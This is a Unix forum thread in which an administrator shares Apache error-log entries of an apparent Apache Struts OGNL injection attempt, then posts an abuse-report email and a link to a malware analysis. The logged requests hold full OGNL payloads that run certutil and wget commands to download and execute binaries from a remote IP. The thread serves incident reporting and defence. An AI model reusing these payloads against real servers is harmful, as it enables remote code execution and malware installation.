Web Hack Attempt from whois 209.126.68.6

Tags
111.90.158.225, 209.126.68.6, hack, javascript, security

Login to Reply

 
Thread Tools Search this Thread
# 1  
Old 3 Weeks Ago
Web Hack Attempt from whois 209.126.68.6

Anyone care to take a stab at decoding this hack attempt on a web server. From the error logs:

Code:
$ cat error.log

Code:
[Mon Nov 19 18:56:44.614122 2018] [core:error] [pid 1211] (36)File name too long: [client 209.126.68.6:45105] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.641285 2018] [core:error] [pid 1268] (36)File name too long: [client 209.126.68.6:45119] AH00036: access to /${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.669095 2018] [core:error] [pid 3624] (36)File name too long: [client 209.126.68.6:45134] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop)&&(pkill loop ; wget -O .loop http://111.90.158.225/d/ft64 && chmod 777 .loop && ./.loop) &').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> ')

Examine carefully in code above including this executable file in the code:

Code:
 wget -O .loop http://111.90.158.225/d/ft32

and

Code:
wget -O .loop http://111.90.158.225/d/ft64

# 2  
Old 3 Weeks Ago
Note:

Code:
to:	        abuse@shinjiru.com.my, ipadmin@primary.net
date:	        Nov 20, 2018, 11:06 AM
subject:	Hacker / Attacker at IP addresses 209.126.68.6 and 111.90.158.225

Quote:
Hi.

We have firm evidence of someone at 209.126.68.6 attempting to execute malicious javascript code which downloads malware from 111.90.158.225.

Here is the log file entries (which we have blocked):
# 3  
Old 3 Weeks Ago
See also:

Code:
$:/var/log# grep 209.126.68.6 *log
auth.log:Nov 19 18:56:44 www sshd[5799]: Did not receive identification string from 209.126.68.6 port 41023

# 4  
Old 3 Weeks Ago
# 5  
Old 3 Weeks Ago
See all this PDF:

https://infosec.cert-pa.it/analyze/7...5e1d793b4b.pdf

Google 111.90.158.225 to learn more if you are interested in malware.
Login to Reply

|
Thread Tools Search this Thread
Search this Thread:
Advanced Search

Similar Threads More UNIX and Linux Forum Topics You Might Find Helpful
Thread Thread Starter Forum Replies Last Post
Whois Lookup Neo What is on Your Mind? 0 03-13-2015 01:32 PM
How to obtain info from whois? postcd Shell Programming and Scripting 1 10-29-2013 05:56 AM
18-Mar-2012 14:25:03.209 general: error: socket: file descriptor exceeds limit (4096/4096) sandeep.tk Solaris 1 03-18-2012 01:21 PM
SFTP return Error Code 126 koti_rama Shell Programming and Scripting 2 01-19-2011 12:44 AM
How can I do whois -r with a input file? uxfuser UNIX for Dummies Questions & Answers 3 11-12-2010 09:55 PM
whois country help learnbash Shell Programming and Scripting 3 05-16-2010 02:52 PM
Exit Status 126 - how to get rid of it glamo_2312 UNIX for Advanced & Expert Users 5 09-23-2009 01:37 AM
ar: 0707-126 milindb AIX 2 08-05-2009 06:44 AM
whois scripting stesecci Shell Programming and Scripting 1 11-07-2008 09:45 AM
All times are GMT -4. The time now is 04:09 AM.

Unix & Linux Forums Content Copyright 1993-2018. All Rights Reserved.